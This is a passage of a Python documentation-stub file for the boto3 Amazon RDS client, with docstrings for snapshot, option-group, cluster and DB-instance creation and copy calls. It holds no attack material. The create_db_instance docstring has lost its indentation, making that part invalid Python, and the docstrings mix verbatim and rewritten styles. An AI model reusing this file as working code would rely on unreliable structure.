    :param TargetDBParameterGroupIdentifier: [REQUIRED]
    The identifier for the copied DB parameter group.
    Constraints:
    Cannot be null, empty, or blank
    Must contain from 1 to 255 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Example: my-db-parameter-group
    :type TargetDBParameterGroupDescription: string
    :param TargetDBParameterGroupDescription: [REQUIRED]
    A description for the copied DB parameter group.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBParameterGroup': {
            'DBParameterGroupName': 'string',
            'DBParameterGroupFamily': 'string',
            'Description': 'string',
            'DBParameterGroupArn': 'string'
        }
    }
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def copy_db_snapshot(SourceDBSnapshotIdentifier=None, TargetDBSnapshotIdentifier=None, KmsKeyId=None, Tags=None, CopyTags=None, PreSignedUrl=None, SourceRegion=None):
    """
    Copies the specified DB snapshot. The source DB snapshot must be in the "available" state.
    To copy a DB snapshot from a shared manual DB snapshot, SourceDBSnapshotIdentifier must be the Amazon Resource Name (ARN) of the shared DB snapshot.
    You can copy an encrypted DB snapshot from another AWS region. In that case, the region where you call the CopyDBSnapshot action is the destination region for the encrypted DB snapshot to be copied to. To copy an encrypted DB snapshot from another region, you must provide the following values:
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    For more information on copying encrypted snapshots from one region to another, see Copying a DB Snapshot in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example copies a DB snapshot.
    Expected Output:
    :example: response = client.copy_db_snapshot(
        SourceDBSnapshotIdentifier='string',
        TargetDBSnapshotIdentifier='string',
        KmsKeyId='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        CopyTags=True|False,
        SourceRegion='string'
    )
    :type SourceDBSnapshotIdentifier: string
    :param SourceDBSnapshotIdentifier: [REQUIRED]
    The identifier for the source DB snapshot.
    If you are copying from a shared manual DB snapshot, this must be the ARN of the shared DB snapshot.
    You cannot copy an encrypted, shared DB snapshot from one AWS region to another.
    Constraints:
    Must specify a valid system snapshot in the 'available' state.
    If the source snapshot is in the same region as the copy, specify a valid DB snapshot identifier.
    If the source snapshot is in a different region than the copy, specify a valid DB snapshot ARN. For more information, go to Copying a DB Snapshot or DB Cluster Snapshot .
    Example: rds:mydb-2012-04-02-00-01
    Example: arn:aws:rds:us-west-2:123456789012:snapshot:mysql-instance1-snapshot-20130805
    :type TargetDBSnapshotIdentifier: string
    :param TargetDBSnapshotIdentifier: [REQUIRED]
    The identifier for the copied snapshot.
    Constraints:
    Cannot be null, empty, or blank
    Must contain from 1 to 255 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Example: my-db-snapshot
    :type KmsKeyId: string
    :param KmsKeyId: The AWS KMS key ID for an encrypted DB snapshot. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
    If you copy an unencrypted DB snapshot and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target DB snapshot using the specified KMS encryption key.
    If you copy an encrypted DB snapshot from your AWS account, you can specify a value for KmsKeyId to encrypt the copy with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the copy of the DB snapshot is encrypted with the same KMS key as the source DB snapshot.
    If you copy an encrypted snapshot to a different AWS region, then you must specify a KMS key for the destination AWS region.
    If you copy an encrypted DB snapshot that is shared from another AWS account, then you must specify a value for KmsKeyId .
    To copy an encrypted DB snapshot to another region, you must set KmsKeyId to the KMS key ID used to encrypt the copy of the DB snapshot in the destination region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type CopyTags: boolean
    :param CopyTags: True to copy all tags from the source DB snapshot to the target DB snapshot; otherwise false. The default is false.
    :type PreSignedUrl: string
    :param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CopyDBSnapshot API action in the AWS region that contains the source DB snapshot to copy. The PreSignedUrl parameter must be used when copying an encrypted DB snapshot from another AWS region.
    The presigned URL must be a valid request for the CopyDBSnapshot API action that can be executed in the source region that contains the encrypted DB snapshot to be copied. The presigned URL request must contain the following parameter values:
    DestinationRegion - The AWS Region that the encrypted DB snapshot will be copied to. This region is the same one where the CopyDBSnapshot action is called that contains this presigned URL. For example, if you copy an encrypted DB snapshot from the us-west-2 region to the us-east-1 region, then you will call the CopyDBSnapshot action in the us-east-1 region and provide a presigned URL that contains a call to the CopyDBSnapshot action in the us-west-2 region. For this example, the DestinationRegion in the presigned URL must be set to the us-east-1 region.
    KmsKeyId - The KMS key identifier for the key to use to encrypt the copy of the DB snapshot in the destination region. This is the same identifier for both the CopyDBSnapshot action that is called in the destination region, and the action contained in the presigned URL.
    SourceDBSnapshotIdentifier - The DB snapshot identifier for the encrypted snapshot to be copied. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you are copying an encrypted DB snapshot from the us-west-2 region, then your SourceDBSnapshotIdentifier looks like the following example: arn:aws:rds:us-west-2:123456789012:snapshot:mysql-instance1-snapshot-20161115 .
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
    :type SourceRegion: string
    :param SourceRegion: The ID of the region that contains the snapshot to be copied.
    :rtype: dict
    :return: {
        'DBSnapshot': {
            'DBSnapshotIdentifier': 'string',
            'DBInstanceIdentifier': 'string',
            'SnapshotCreateTime': datetime(2015, 1, 1),
            'Engine': 'string',
            'AllocatedStorage': 123,
            'Status': 'string',
            'Port': 123,
            'AvailabilityZone': 'string',
            'VpcId': 'string',
            'InstanceCreateTime': datetime(2015, 1, 1),
            'MasterUsername': 'string',
            'EngineVersion': 'string',
            'LicenseModel': 'string',
            'SnapshotType': 'string',
            'Iops': 123,
            'OptionGroupName': 'string',
            'PercentProgress': 123,
            'SourceRegion': 'string',
            'SourceDBSnapshotIdentifier': 'string',
            'StorageType': 'string',
            'TdeCredentialArn': 'string',
            'Encrypted': True|False,
            'KmsKeyId': 'string',
            'DBSnapshotArn': 'string',
            'Timezone': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    TargetDBSnapshotIdentifier - The identifier for the new copy of the DB snapshot in the destination region.
    SourceDBSnapshotIdentifier - The DB snapshot identifier for the encrypted snapshot to be copied. This identifier must be in the ARN format for the source region and is the same value as the SourceDBSnapshotIdentifier in the presigned URL.
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def copy_option_group(SourceOptionGroupIdentifier=None, TargetOptionGroupIdentifier=None, TargetOptionGroupDescription=None, Tags=None):
    """Copy the specified option group.

    See also: AWS API Documentation

    :example: response = client.copy_option_group(
        SourceOptionGroupIdentifier='string',
        TargetOptionGroupIdentifier='string',
        TargetOptionGroupDescription='string',
        Tags=[{'Key': 'string', 'Value': 'string'}]
    )
    :type SourceOptionGroupIdentifier: string
    :param SourceOptionGroupIdentifier: [REQUIRED]
        The identifier or ARN of the source option group. Must name a valid
        option group. When the source is in the same region as the copy, a
        plain identifier (for example ``my-option-group``) or an ARN is
        accepted; when the source is in a different region, a full ARN is
        required, for example
        ``arn:aws:rds:us-west-2:123456789012:og:special-options``.
    :type TargetOptionGroupIdentifier: string
    :param TargetOptionGroupIdentifier: [REQUIRED]
        The identifier for the copied option group. Cannot be null, empty,
        or blank; must contain 1 to 255 alphanumeric characters or hyphens;
        the first character must be a letter; it cannot end with a hyphen or
        contain two consecutive hyphens. Example: ``my-option-group``.
    :type TargetOptionGroupDescription: string
    :param TargetOptionGroupDescription: [REQUIRED]
        The description for the copied option group.
    :type Tags: list
    :param Tags: A list of ``{'Key': str, 'Value': str}`` tag dicts to
        assign to the copy. Keys may be 1 to 128 Unicode characters and
        values 1 to 256; neither may be prefixed with ``aws:`` or ``rds:``,
        and both are restricted to the character set
        ``'^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$'`` (Java regex).
    :rtype: dict
    :return: A dict whose ``'OptionGroup'`` entry describes the new group:
        ``OptionGroupName``, ``OptionGroupDescription``, ``EngineName``,
        ``MajorEngineVersion``, an ``Options`` list (each option carrying
        its ``OptionSettings``, ``DBSecurityGroupMemberships`` and
        ``VpcSecurityGroupMemberships``),
        ``AllowsVpcAndNonVpcInstanceMemberships``, ``VpcId`` and
        ``OptionGroupArn``.
    :returns:
        Related actions: ModifyDBInstance, RebootDBInstance,
        RestoreDBInstanceFromDBSnapshot, RestoreDBInstanceToPointInTime
    """
    # Documentation stub only: the live implementation is generated by
    # botocore from the RDS service model at client-creation time.
    pass
def create_db_cluster(AvailabilityZones=None, BackupRetentionPeriod=None, CharacterSetName=None, DatabaseName=None, DBClusterIdentifier=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, DBSubnetGroupName=None, Engine=None, EngineVersion=None, Port=None, MasterUsername=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, ReplicationSourceIdentifier=None, Tags=None, StorageEncrypted=None, KmsKeyId=None, PreSignedUrl=None, EnableIAMDatabaseAuthentication=None, SourceRegion=None):
    """Create a new Amazon Aurora DB cluster.

    Pass ``ReplicationSourceIdentifier`` to create the cluster as a Read
    Replica of another DB cluster or an Amazon RDS MySQL DB instance. For
    cross-region replication from an encrypted source cluster you must also
    supply ``PreSignedUrl``. For more information on Amazon Aurora, see
    Aurora on Amazon RDS in the Amazon RDS User Guide.

    See also: AWS API Documentation

    :type AvailabilityZones: list
    :param AvailabilityZones: EC2 Availability Zones (list of strings) that
        instances in the cluster can be created in.
    :type BackupRetentionPeriod: integer
    :param BackupRetentionPeriod: Number of days automated backups are
        retained. Default: 1. Must be a value from 1 to 35.
    :type CharacterSetName: string
    :param CharacterSetName: Associates the cluster with the specified
        CharacterSet.
    :type DatabaseName: string
    :param DatabaseName: Name (up to 64 alphanumeric characters) of the
        database to create; if omitted, no database is created.
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
        The DB cluster identifier, stored as a lowercase string. Must be
        1 to 63 alphanumeric characters or hyphens, start with a letter,
        and must not end with a hyphen or contain two consecutive hyphens.
        Example: ``my-cluster1``.
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: DB cluster parameter group to
        associate. Defaults to ``default.aurora5.6`` when omitted. Must be
        1 to 255 alphanumeric characters, start with a letter, and must not
        end with a hyphen or contain two consecutive hyphens.
    :type VpcSecurityGroupIds: list
    :param VpcSecurityGroupIds: EC2 VPC security group IDs (list of
        strings) to associate with this cluster.
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: DB subnet group to associate. At most 255
        alphanumeric characters, periods, underscores, spaces, or hyphens;
        must not be ``default``. Example: ``mySubnetgroup``.
    :type Engine: string
    :param Engine: [REQUIRED]
        Database engine for this cluster. Valid Values: ``aurora``.
    :type EngineVersion: string
    :param EngineVersion: Engine version number. Aurora example: ``5.6.10a``.
    :type Port: integer
    :param Port: Port the cluster's instances accept connections on.
        Default: 3306.
    :type MasterUsername: string
    :param MasterUsername: Master user name. Must be 1 to 16 alphanumeric
        characters, start with a letter, and must not be a reserved word
        for the chosen engine.
    :type MasterUserPassword: string
    :param MasterUserPassword: Master user password: 8 to 41 characters,
        any printable ASCII except '/', ''', or '@'.
    :type OptionGroupName: string
    :param OptionGroupName: Option group to associate. Permanent options
        cannot be removed from an option group, and the option group cannot
        be removed from a DB cluster once associated.
    :type PreferredBackupWindow: string
    :param PreferredBackupWindow: Daily time range for automated backups
        (when ``BackupRetentionPeriod`` enables them), in the format
        ``hh24:mi-hh24:mi`` (UTC), at least 30 minutes long, and not
        conflicting with the maintenance window. Default: a random
        30-minute window from an 8-hour per-region block.
    :type PreferredMaintenanceWindow: string
    :param PreferredMaintenanceWindow: Weekly maintenance window in UTC,
        format ``ddd:hh24:mi-ddd:hh24:mi`` (days Mon-Sun), minimum 30
        minutes. Default: a random 30-minute window on a random day.
    :type ReplicationSourceIdentifier: string
    :param ReplicationSourceIdentifier: ARN of the source DB instance or DB
        cluster when this cluster is created as a Read Replica.
    :type Tags: list
    :param Tags: A list of ``{'Key': str, 'Value': str}`` tag dicts. Keys
        may be 1 to 128 Unicode characters and values 1 to 256; neither may
        be prefixed with ``aws:`` or ``rds:``, and both are restricted to
        ``'^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$'`` (Java regex).
    :type StorageEncrypted: boolean
    :param StorageEncrypted: Whether the DB cluster is encrypted.
    :type KmsKeyId: string
    :param KmsKeyId: KMS key identifier (ARN, or an alias when the key
        belongs to the same account) for an encrypted cluster. If
        ``StorageEncrypted`` is true and no key is given, your account's
        regional default encryption key is used. Cross-region Read Replicas
        of encrypted clusters require a key valid in the destination region.
    :type PreSignedUrl: string
    :param PreSignedUrl: A Signature Version 4 signed ``CreateDBCluster``
        request URL for the source region; needed only for cross-region
        replication from an encrypted cluster. It must embed ``KmsKeyId``
        (the destination-region key), ``DestinationRegion`` (where the
        Aurora Read Replica is created) and ``ReplicationSourceIdentifier``
        (the source cluster's ARN, e.g.
        ``arn:aws:rds:us-west-2:123456789012:cluster:aurora-cluster1``).
        Note that this parameter is automatically populated if it is not
        provided; including it is not required.
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: True to map AWS IAM accounts to
        database accounts; otherwise false. Default: false.
    :type SourceRegion: string
    :param SourceRegion: ID of the region containing the source for the
        db cluster.
    :rtype: dict
    :return: A dict whose ``'DBCluster'`` entry describes the new cluster:
        storage, Availability Zones, backup settings, identifiers,
        parameter/subnet groups, status and progress, restore times,
        endpoints (writer and reader), engine details, port, master user,
        option-group and security-group memberships, maintenance/backup
        windows, replication source, read-replica identifiers, member
        instances, hosted zone, encryption settings (``StorageEncrypted``,
        ``KmsKeyId``), resource IDs/ARN, associated IAM roles,
        ``IAMDatabaseAuthenticationEnabled`` and ``ClusterCreateTime``.
    :returns:
        Related actions: CreateDBCluster, DeleteDBCluster,
        FailoverDBCluster, ModifyDBCluster, RestoreDBClusterFromSnapshot,
        RestoreDBClusterToPointInTime
    """
    # Documentation stub only: the live implementation is generated by
    # botocore from the RDS service model at client-creation time.
    pass
def create_db_cluster_parameter_group(DBClusterParameterGroupName=None, DBParameterGroupFamily=None, Description=None, Tags=None):
    """Create a new DB cluster parameter group.

    Parameters in a DB cluster parameter group apply to every instance in
    the cluster. The group starts out with the engine's default parameters;
    customize it afterwards with ModifyDBClusterParameterGroup, attach it
    with ModifyDBCluster, and reboot the cluster's DB instances (without
    failover) for the new group and settings to take effect. For more
    information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon
    RDS User Guide.

    See also: AWS API Documentation

    :example: response = client.create_db_cluster_parameter_group(
        DBClusterParameterGroupName='string',
        DBParameterGroupFamily='string',
        Description='string',
        Tags=[{'Key': 'string', 'Value': 'string'}]
    )
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: [REQUIRED]
        Name of the DB cluster parameter group. Must be 1 to 255
        alphanumeric characters, start with a letter, and must not end with
        a hyphen or contain two consecutive hyphens. Stored as a lowercase
        string.
    :type DBParameterGroupFamily: string
    :param DBParameterGroupFamily: [REQUIRED]
        The parameter group family. A group belongs to exactly one family
        and can be applied only to clusters running a compatible engine and
        engine version.
    :type Description: string
    :param Description: [REQUIRED]
        The description for the DB cluster parameter group.
    :type Tags: list
    :param Tags: A list of ``{'Key': str, 'Value': str}`` tag dicts. Keys
        may be 1 to 128 Unicode characters and values 1 to 256; neither may
        be prefixed with ``aws:`` or ``rds:``, and both are restricted to
        ``'^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$'`` (Java regex).
    :rtype: dict
    :return: A dict whose ``'DBClusterParameterGroup'`` entry holds
        ``DBClusterParameterGroupName``, ``DBParameterGroupFamily``,
        ``Description`` and ``DBClusterParameterGroupArn``.
    """
    # Documentation stub only: the live implementation is generated by
    # botocore from the RDS service model at client-creation time.
    pass
def create_db_cluster_snapshot(DBClusterSnapshotIdentifier=None, DBClusterIdentifier=None, Tags=None):
    """Create a snapshot of a DB cluster.

    For more information on Amazon Aurora, see Aurora on Amazon RDS in the
    Amazon RDS User Guide.

    See also: AWS API Documentation

    :example: response = client.create_db_cluster_snapshot(
        DBClusterSnapshotIdentifier='string',
        DBClusterIdentifier='string',
        Tags=[{'Key': 'string', 'Value': 'string'}]
    )
    :type DBClusterSnapshotIdentifier: string
    :param DBClusterSnapshotIdentifier: [REQUIRED]
        Identifier of the DB cluster snapshot, stored as a lowercase
        string. Must be 1 to 63 alphanumeric characters or hyphens, start
        with a letter, and must not end with a hyphen or contain two
        consecutive hyphens. Example: ``my-cluster1-snapshot1``.
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
        Identifier of the DB cluster to snapshot; not case-sensitive. Must
        be 1 to 63 alphanumeric characters or hyphens, start with a letter,
        and must not end with a hyphen or contain two consecutive hyphens.
        Example: ``my-cluster1``.
    :type Tags: list
    :param Tags: Tags to assign to the snapshot, as ``{'Key': str,
        'Value': str}`` dicts. Keys may be 1 to 128 Unicode characters and
        values 1 to 256; neither may be prefixed with ``aws:`` or ``rds:``,
        and both are restricted to
        ``'^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$'`` (Java regex).
    :rtype: dict
    :return: A dict whose ``'DBClusterSnapshot'`` entry describes the
        snapshot: Availability Zones, snapshot and cluster identifiers,
        creation times, engine and version, allocated storage, status,
        port, VPC ID, master username, license model, snapshot type,
        percent progress, encryption fields (``StorageEncrypted``,
        ``KmsKeyId``), ARNs (``DBClusterSnapshotArn``,
        ``SourceDBClusterSnapshotArn``) and
        ``IAMDatabaseAuthenticationEnabled``.
    :returns:
        Related actions: CreateDBClusterSnapshot, DeleteDBClusterSnapshot
    """
    # Documentation stub only: the live implementation is generated by
    # botocore from the RDS service model at client-creation time.
    pass
def create_db_instance(DBName=None, DBInstanceIdentifier=None, AllocatedStorage=None, DBInstanceClass=None, Engine=None, MasterUsername=None, MasterUserPassword=None, DBSecurityGroups=None, VpcSecurityGroupIds=None, AvailabilityZone=None, DBSubnetGroupName=None, PreferredMaintenanceWindow=None, DBParameterGroupName=None, BackupRetentionPeriod=None, PreferredBackupWindow=None, Port=None, MultiAZ=None, EngineVersion=None, AutoMinorVersionUpgrade=None, LicenseModel=None, Iops=None, OptionGroupName=None, CharacterSetName=None, PubliclyAccessible=None, Tags=None, DBClusterIdentifier=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, StorageEncrypted=None, KmsKeyId=None, Domain=None, CopyTagsToSnapshot=None, MonitoringInterval=None, MonitoringRoleArn=None, DomainIAMRoleName=None, PromotionTier=None, Timezone=None, EnableIAMDatabaseAuthentication=None):
"""
Creates a new DB instance.
See also: AWS API Documentation
Examples
This example creates a DB instance.
Expected Output:
:example: response = client.create_db_instance(
DBName='string',
DBInstanceIdentifier='string',
AllocatedStorage=123,
DBInstanceClass='string',
Engine='string',
MasterUsername='string',
MasterUserPassword='string',
DBSecurityGroups=[
'string',
],
VpcSecurityGroupIds=[
'string',
],
AvailabilityZone='string',
DBSubnetGroupName='string',
PreferredMaintenanceWindow='string',
DBParameterGroupName='string',
BackupRetentionPeriod=123,
PreferredBackupWindow='string',
Port=123,
MultiAZ=True|False,
EngineVersion='string',
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
Iops=123,
OptionGroupName='string',
CharacterSetName='string',
PubliclyAccessible=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
DBClusterIdentifier='string',
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
StorageEncrypted=True|False,
KmsKeyId='string',
Domain='string',
CopyTagsToSnapshot=True|False,
MonitoringInterval=123,
MonitoringRoleArn='string',
DomainIAMRoleName='string',
PromotionTier=123,
Timezone='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBName: string
:param DBName: The meaning of this parameter differs according to the database engine you use.
Type: String
MySQL
The name of the database to create when the DB instance is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
MariaDB
The name of the database to create when the DB instance is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
PostgreSQL
The name of the database to create when the DB instance is created. If this parameter is not specified, the default 'postgres' database is created in the DB instance.
Constraints:
Must contain 1 to 63 alphanumeric characters
Must begin with a letter or an underscore. Subsequent characters can be letters, underscores, or digits (0-9).
Cannot be a word reserved by the specified database engine
Oracle
The Oracle System ID (SID) of the created DB instance. If you specify null , the default value ORCL is used. You can't specify the string NULL, or any other reserved word, for DBName .
Default: ORCL
Constraints:
Cannot be longer than 8 characters
SQL Server
Not applicable. Must be null.
Amazon Aurora
The name of the database to create when the primary instance of the DB cluster is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This parameter is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens (1 to 15 for SQL Server).
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: mydbinstance
:type AllocatedStorage: integer
:param AllocatedStorage: The amount of storage (in gigabytes) to be initially allocated for the database instance.
Type: Integer
Amazon Aurora
Not applicable. Aurora cluster volumes automatically grow as the amount of data in your database increases, though you are only charged for the space that you use in an Aurora cluster volume.
MySQL
Constraints: Must be an integer from 5 to 6144.
MariaDB
Constraints: Must be an integer from 5 to 6144.
PostgreSQL
Constraints: Must be an integer from 5 to 6144.
Oracle
Constraints: Must be an integer from 10 to 6144.
SQL Server
Constraints: Must be an integer from 200 to 4096 (Standard Edition and Enterprise Edition) or from 20 to 4096 (Express Edition and Web Edition)
:type DBInstanceClass: string
:param DBInstanceClass: [REQUIRED]
The compute and memory capacity of the DB instance. Note that not all instance classes are available in all regions for all DB engines.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.xlarge |db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
:type Engine: string
:param Engine: [REQUIRED]
The name of the database engine to be used for this instance.
Valid Values: mysql | mariadb | oracle-se1 | oracle-se2 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
Not every database engine is available for every AWS region.
:type MasterUsername: string
:param MasterUsername: The name for the master database user.
Amazon Aurora
Not applicable. You specify the name for the master database user when you create your DB cluster.
MariaDB
Constraints:
Must be 1 to 16 alphanumeric characters.
Cannot be a reserved word for the chosen database engine.
Microsoft SQL Server
Constraints:
Must be 1 to 128 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
MySQL
Constraints:
Must be 1 to 16 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
Oracle
Constraints:
Must be 1 to 30 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
PostgreSQL
Constraints:
Must be 1 to 63 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
:type MasterUserPassword: string
:param MasterUserPassword: The password for the master database user. Can be any printable ASCII character except '/', ''', or '@'.
Amazon Aurora
Not applicable. You specify the password for the master database user when you create your DB cluster.
MariaDB
Constraints: Must contain from 8 to 41 characters.
Microsoft SQL Server
Constraints: Must contain from 8 to 128 characters.
MySQL
Constraints: Must contain from 8 to 41 characters.
Oracle
Constraints: Must contain from 8 to 30 characters.
PostgreSQL
Constraints: Must contain from 8 to 128 characters.
:type DBSecurityGroups: list
:param DBSecurityGroups: A list of DB security groups to associate with this DB instance.
Default: The default DB security group for the database engine.
(string) --
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of EC2 VPC security groups to associate with this DB instance.
Default: The default EC2 VPC security group for the DB subnet group's VPC.
(string) --
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in. For information on regions and Availability Zones, see Regions and Availability Zones .
Default: A random, system-chosen Availability Zone in the endpoint's region.
Example: us-east-1d
Constraint: The AvailabilityZone parameter cannot be specified if the MultiAZ parameter is set to true . The specified Availability Zone must be in the same region as the current endpoint.
:type DBSubnetGroupName: string
:param DBSubnetGroupName: A DB subnet group to associate with this DB instance.
If there is no DB subnet group, then it is a non-VPC DB instance.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC). For more information, see DB Instance Maintenance .
Format: ddd:hh24:mi-ddd:hh24:mi
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type DBParameterGroupName: string
:param DBParameterGroupName: The name of the DB parameter group to associate with this DB instance. If this argument is omitted, the default DBParameterGroup for the specified engine will be used.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days for which automated backups are retained. Setting this parameter to a positive number enables backups. Setting this parameter to 0 disables automated backups.
Default: 1
Constraints:
Must be a value from 0 to 35
Cannot be set to 0 if the DB instance is a source to Read Replicas
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled, using the BackupRetentionPeriod parameter. For more information, see DB Instance Backups .
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred DB Instance Maintenance Window .
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:type Port: integer
:param Port: The port number on which the database accepts connections.
MySQL
Default: 3306
Valid Values: 1150-65535
Type: Integer
MariaDB
Default: 3306
Valid Values: 1150-65535
Type: Integer
PostgreSQL
Default: 5432
Valid Values: 1150-65535
Type: Integer
Oracle
Default: 1521
Valid Values: 1150-65535
SQL Server
Default: 1433
Valid Values: 1150-65535 except for 1434 , 3389 , 47001 , 49152 , and 49152 through 49156 .
Amazon Aurora
Default: 3306
Valid Values: 1150-65535
Type: Integer
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment. You cannot set the AvailabilityZone parameter if the MultiAZ parameter is set to true.
:type EngineVersion: string
:param EngineVersion: The version number of the database engine to use.
The following are the database engines and major and minor versions that are available with Amazon RDS. Not every database engine is available for every AWS region.
Amazon Aurora
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-2, eu-west-1, us-east-1, us-east-2, us-west-2): 5.6.10a
MariaDB
Version 10.1 (available in these AWS regions: us-east-2): 10.1.16
Version 10.1 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-west-1, us-west-2): 10.1.14
Version 10.0 (available in all AWS regions): 10.0.24
Version 10.0 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 10.0.17
Microsoft SQL Server 2016
13.00.2164.0.v1 (supported for all editions, and all AWS regions except sa-east-1)
Microsoft SQL Server 2014
12.00.5000.0.v1 (supported for all editions, and all AWS regions)
12.00.4422.0.v1 (supported for all editions except Enterprise Edition, and all AWS regions except us-east-2)
Microsoft SQL Server 2012
11.00.6020.0.v1 (supported for all editions, and all AWS regions)
11.00.5058.0.v1 (supported for all editions, and all AWS regions except us-east-2)
11.00.2100.60.v1 (supported for all editions, and all AWS regions except us-east-2)
Microsoft SQL Server 2008 R2
